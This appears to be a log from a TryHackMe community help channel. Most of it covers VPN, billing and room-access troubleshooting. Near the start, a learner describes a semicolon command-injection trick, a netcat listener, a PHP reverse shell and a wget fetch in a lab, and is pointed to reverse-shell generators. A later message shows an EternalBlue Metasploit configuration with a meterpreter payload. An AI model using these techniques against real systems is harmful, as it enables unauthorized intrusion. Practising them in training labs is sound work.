Hey guys I need help, so I'm doing Command injection and I already got the flag but I want to do a reverse shell.

I figured that if I put a semicolon first in the input box, I can run commands like whoami, hostname, etc.

so now I'm trying to do the php reverse shell that I downloaded from pentestmonkey from github

I change the rev shell file to my IP, and port to 4444, I start listening using "nc -lvp 4444", and I start a server using "sudo python3 -m http.server"

But now I'm stuck, in previous rooms I accessed the php file using the url "index.php?file=http://........"
now that doesn't work anymore, so I tried typing ";wget "http://......" in the input box, but that doesn't work either.

Any ideas?

remote file inclusion and by extension getting shells that way is nearly never a thingy

if you can run hostname and whoami try something like a bash or python reverse shell

i.e if you got command execution a php reverse shell is not the way forward

generally

Oh so should i get a premade file similar to the php reverse shell from pentestmonkey?

but for python this time

facedesk

no not a file

a command

see https://revshells.com for examples

i downloaded revshellgen

is that okay?

doubt it

just run a command to spawn a shell

can't really give them here as examples without possibly getting yelled at

can you please DM them?

no need.. the commands are listed on revshells.com above

okay thank you

it even has easy to change ip and port parts

and what the listerner command would be

Yayy I'm in! Thanks!

Gave +1 Rep to @plush bay

no problem

Hello, quick question about subscriptions. Is there any way to purchase a subscription code at a student discount? I'm assuming no, since the system doesn't know who will be redeeming the code at the time it is purchased, but just wanted to check. Thanks!

You're correct, you can't purchase vouchers for subscriptions.

I purchased a premium membership, trying 3 times to pay for it. All 3 transactions came out of my bank account and I still don’t have access to premium. I contacted support 7 days ago with absolutely no response. I’m beyond irritated and want this fixed. Does anyone here work directly for Tryhackme?

There is site staff, but account issues can only be spoken about over E-mail.

Response time is 3-4 day(s), It's unusual for them to miss out.

Send another E-mail today, but not more than once in 7 days, I'm sure someone from support will see this and ask you to DM them.

DM me your email address

We're on 7d right now, I would keep telling people we're 5-7 days because of weekends and all that

No probemo.

Yo Someone please help I'm in the Brainstorm ctf room is it safe to run the exe file on my orginal machine or do i have to set up a test machine

Immunity debugger?

My THM vpn on Windows worked earlier today but at some point it stopped working, no connection to any 10.10.x IP's, tried multiple different boxes. Also I see a keepalive_timeout every 2 minutes in my openvpn client log when connected to either EU-VIP-1 or EU-VIP-2 endpoints. Other non-THM VPN connections in my OpenVPN client work fine. Rebooted windows, no change.

https://tryhackme.com/access says all is fine, green checkboxes

can you curl https://10.10.10.10/whoami and get respond ?

Nope, it can't open a connection on TCP443 at all it seems

also ping -c 3 10.10.10.10 do you have lost packets or ?

yes nothing is going through, all time out

probably also why the keepalives of the vpn connection itself also timeout

no other vpn connection active ? meaning no vpn stacking

nop, only THM

network unchanged as well compared to when it was working earlier today

try regenerate vpn file?

tried that, no change

(just did)

It's might be the gui error

Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1     192.168.1.13     25
        10.10.0.0      255.255.0.0        10.11.0.1      10.11.47.51   1001
        10.11.0.0      255.255.0.0         On-link       10.11.47.51    257
      10.11.47.51  255.255.255.255         On-link       10.11.47.51    257
    10.11.255.255  255.255.255.255         On-link       10.11.47.51    257

if you have some linux/kali in VM, try from there

routes are being added

will try it in a vm

might be just "the windows" thing. if works from VM

feels like some adaptive firewall thingy decided to drop all traffic for the vpn at some point, frustrating

windows =/ hehe

well vpn to my own box works like a charm, so its probably something specific to the connection method that THM uses for their ovpn profile then 🙂

Which country are you in?

Netherlands

what country flag you have ?

What do you mean?

sry mi bad. ignore that

i can't tell for windows since im not using it. but as some from nl also i never har issue using linux

Anyone have idea of resolving country flag issue? I have tried many things but not working

Windows OpenVPN isn't very good.

Are you using your host, or a VM?

Hey guys, i cant reach thm machines with VPN on,
1.openvpn session is successfull according to the site.
2.already tried reloading conf file on different servers.
3. routing table seems ok.
i am with vpn on my VM and trying to ssh to the machine on Metasploit: Exploitation msfvenom part, this machine does not reply to ping as well - earlier i was in another room and couldnt nmap a machine that responded to a scan from the attack box.
Thanks to any helpers

!vpnscript

try that and see if it finds anything

MTU value failed at 1000, aborting MTU check

happens again after reloading another config file

okay then that is weird

Hey Guys, I subscribed for Tryhackme premium but my account isn't activated yet, the money got deducted it's been more than 10days can somebody help ?
Thank You.

Also raised a ticket still no response

email might need 3-4 day tp respond

5-7 now, due to the weekend.

fair yea...

But I raised it on july 14

solved by downgrading from openvpn3 to openvpn

Hey guys, is there any problem with the subscription page? I'm trying to subscribe but nothing happens on the webpage https://tryhackme.com/why-subscribe

This was on my windows host, will try a kali vm later when I have time

It's not a good idea to have your host on the network.

any chance someone could help me w some issue connecting the enumeratingAD Room?

yuups

im connected to the vpn just fine, and when i run nslookup thmdc.za.tryhackme.com it resolves to the DC IP as it should

but when i go to http://distributor.za.tryhackme.com/creds to get the credentials for the room keeps telling me connection timed out but internet is still working so its the link

hmmm

added za.tryhackme.com + IP to /etc/resolve.conf already

so

idk

is it the first entry or do you have some other dns entry above it???

search za.tryhackme.com nameserver 10.200.68.101

2 more below it

should i try removing the 2 other dns servers i have in there temporarily?

nah that should be fine then

well can't do much more then recommend trying the vpn script or trying other subnets of the network by leaving and rejoining

!vpnscript

gotcha thank u

hope you can fix

is it just for me that the subscription is not working?

¯_(ツ)_/¯

I am currently in the "Walking and Application" section of the site, and when I try to access the website listed via the virtual machine, I keep getting a 504 Gateway Time-Out. Am I doing something wrong?

Make sure you're connected to the vpn if using a local VM.

Thank you

You're accessing the wrong IP

Or is that 405 🤔

I used the VPN and it worked fine.

Hi, may I know if I can clone a machine from a challenge to my local VM? Trying to demo https://tryhackme.com/room/tomghost# for the class

Hi,
the tickets for the Red Teaming path won't be provided anymore, right?

yuups if things work as intended

mhh ok, I hope there might be another chance to get the title, or even better a Blue Teamer title in the future 🤩

I cant join a room, when i press join room i get redirected to a overview of my completed rooms

can you help me?

depends on what you need help with

.

!docs verify

can you then post a screenshot of the process or a gif

idk how i would even create a gif XD

but ill do

oh what

the !verify command goes in a direct message/private message to the bot

i have to dm the bot

yuups

shit i dmd you

;-;

dont steal me pls XD

oh damn wrong bot

bruh why is this so hard

lmao

no worries

ok so i press here and that takes me here

hmm weird

ye

and i need to join the room to play it

@cold fog any clue why the breaching AD network would redirect to the my rooms page when trying to join it??? ah never mind... @storm sun you need a 7 day streak to join the network unless you are a subscriber

bruh what...

it doesnt say that anywhere

on the learn page

if you scroll down to the networks on the learn page it tells you this

oh

ye i dont have that

i have only today

so i have to wait basically a week then

yuup

i wanted to do the new room

but it says i need this room for knowledge

aaah well the acitve directory basics room might cover enough stuff to get you started for #1133413669288546456

ok ill just go for it then

and do this when i get the streak

https://tryhackme.com/room/winadbasics @storm sun

they should make it more obvious tho

ye i already did that room

yuup enjoy and happy learning

thank you!

shadow is happy in their image spotting to have noticed your streak number and not being a subscriber causing this problem

XD fr

and also even spotting that you need a streak

and why can i not RDP into the newest room?

nvm ijust had to wait and try again

wait no am i even supposed to RDP into it?

probably

kinda hard to do any practical learning and hardening without using rdp or ssh

ok i got it now yes, i just had to wait longer XD

I'm opening THM in a vanilla kali installation in firefox, and for some pages it partially loads the page and then gets stuck on various 3rd party elements like google analytics, gravatar, etc. Anybody encountered this before? The rest of the site doesn't seem to load at that point so I can't really use THM this way

Waiting for region1.analytics.google.com.... is all it says in the status bar

Tried installing adblocker addon in firefox to see if that helps but it doesn't seem to affect it.

After a few minutes of waiting it seems to timeout on those elements and then suddenly the page appears.

This shows the 2-3min loading time in the network requests list

hi so im using openvpn to connect to a machine, but whenever i try to use metasploit, it gives me the error: ```
[-] 10.10.131.248:445 - Rex::ConnectionRefused: The connection was refused by the remote host (10.10.131.248:445).
[*] 10.10.131.248:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.131.248:445 - The target is not vulnerable.

these are my options:

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

RHOSTS 10.10.131.248 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.96.108 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name

1 Windows 7

the rhosts ip is set to the ip at the top of the webpage (the remote ip) and my lhosot is set to my vpn ip port 4444 is also available on my machine

PING 10.10.131.248 (10.10.131.248) 56(84) bytes of data.
64 bytes from 10.10.131.248: icmp_seq=1 ttl=63 time=172 ms
64 bytes from 10.10.131.248: icmp_seq=2 ttl=63 time=151 ms
64 bytes from 10.10.131.248: icmp_seq=3 ttl=63 time=259 ms
64 bytes from 10.10.131.248: icmp_seq=4 ttl=63 time=152 ms
64 bytes from 10.10.131.248: icmp_seq=5 ttl=63 time=210 ms

When i ping, it works but in the exploit attempt it refuses.
Also I am in the metasploit intro page

Which room are you doing?

https://tryhackme.com/room/metasploitintro#

Also my machine is running kali linux if that matters

Hi, may I know if I can clone a machine from a challenge to my local VM? Trying to demo https://tryhackme.com/room/tomghost# for the class

No, you're not able to clone any of the THM machines.

How long ago did you start the machine?

like 10min ago

Terminate, and restart the machine.

leave it 5-10 minutes until you start trying to exploit the machine.

I wasn't able to do yours, but I booted up a machine and got it.

Just need to wait.

still doesnt work

wait am i using the right ip?

is it supposed to be the attackbox ip

if no, which ip

RHOST is target.

LHOST is your machine.

So if it's attackbox, ens5.
VM - tun0

RHOST = 10.10.131.28

For me

how do i get those values, like just curious what they mean exactly

ip a s

okay with the machines ip (for me its 10.10.86.113) even ping doesnt work

Will show you all your interfaces and their ip.

how can I acces my kali machine if I have premium?

There is a drop down menu

BRUH, i set lhost to my vpn ip, not to tun0

Are you on your own Kali machine?

Or attackbox?

attackbox. I can't acces it in a separate tab for example?

#general message

thanks! you think i should change to vm or dual boot with kali?

Vm.

Hello

I am trying to join this room: https://tryhackme.com/room/breachingad but every time I am redirected to /r/rooms. That way, I am not able to join this room

hey! Thanks for the video - that's super useful. I'll forward this internally

Gave +1 Rep to @inner parcel

Is this with any room or just breachingad?

Just breachingad

Ah okay, so taking a look, your streak is "1". You need to have a streak of at least 7 or be subscribed to THM to access networks such as breachingAD. The networks show their entry requirements 🙂

Ohhh got it, thank you!

There used to be a pop-up that would say that if you aren't eligible, but it doesn't seem the be displaying anymore. I'll pass that along internally:)

Okay. Glad to help

heey

openvpn is giving this error msg WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set. 2023-07-26 14:38:06 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.

i tried to change chipher to data ciphers but didn t work
any solution ?

I take it this is for the TryHackMe openvpn config?

ye

You should be okay at the moment unless there's other output with relevant errors at the end of the terminal. This is just a compatability warning 🙂 If you can access http://10.10.10.10 okay -- you're fine 🙂

it is up to the room creator to accept and get those added... hence if the room is very old it might not get new writeups/walkthroughs accepted

I got an email that my payment didnt go through. If I click Pay now, I get "Your order URL has expired. Please try again.". I can't reorder it myself because I was still on the old $10 per month.

Hello guys an girl, I am a new cammer in You're chat, nice to meet you all in this chat, in this chat history I just want to see and learning and try to learn to fix and training with support may skills, I hope we can work together² gether² 😊

anyone else having connection issues? the vpn keep restarting when I start it and the attack box fails to connect as well

hello everyone where can i address a challenge concerning streaks please

Hi there, I have a trouble connecting to the VPN. Ping to the 34.253.19.14 is successful.

Which server are you trying to connect to?

EU-VIP-1 (but I tried other ones as well with the same result)

Regenerate your configuration

I already tried twice, the same result.

are there any plans on fixing task 10 of Evading Logging and Monitoring?

Any THM admin , mod here I am having problem in my country flag it's showing wrong flag and I try all methods still showing same

Which country does it show?

I just reinstalled openvpn to the latest version

I cant get this thing to run

2023-07-27 07:37:02 ERROR: Failed to apply push options
2023-07-27 07:37:02 Failed to open tun/tap interface```

apparently I have to add a cipher but I dont know how

@weary spindle

post your full command

my command was sudo openvpn file.ovpn

Check the pins in this channel

also, threes a cours/path/whatever in THM that covers conencting with vpn is three? or am I mistaken?

You mean ```Please ensure you are not using the OpenVPN GUI or Network Manager.
Use the command-line interface to connect to the OpenVPN service.

If you are on MacOS, you may need to use Homebrew to install OpenVPN; brew install openvpn

If you are on Linux, please use your default package manager. For Ubuntu it is apt, sudo apt install openvpn.``` ? @woeful hedge

No, there is a pin that goes over your issue

but yeah a quick google or even chat gpt will goive info:

So, the line should look something like this:

--data-ciphers AES-256-CBC:AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305

This tells your OpenVPN client to use AES-256-CBC as well as the other ciphers it was already using, allowing it to connect to servers that use any of these ciphers.```

but the tun issue thats a perms issue. are you sure youre properly suding? maybe reistall openvpn

Honest answer, I feel like youve come here for help without trying to research or fix it first. which isnt the way round you should be doing it

the ping:

 Replace the cipher AES-256-CBC line in your .ovpn config with data-ciphers AES-256-CBC

To do this, you can use the text editor of your choice, or simply type nano filename.ovpn into your terminal.
Make sure not to edit anything else, and save it with the same file name.

Then, re-run the VPN with openvpn filename.ovpn. Let me or any of our community mentors know if these steps have not worked for you and we will troubleshoot further.```

Let's fix the cipher issue first please. Changing too many things at once causes a bigger mess.

but if the ciipher issue is relating to his version then a resintall would fix it too (once hes verified its a version issue etc..)

the issue is I dont think hes done any research first and jumped straight to asking for help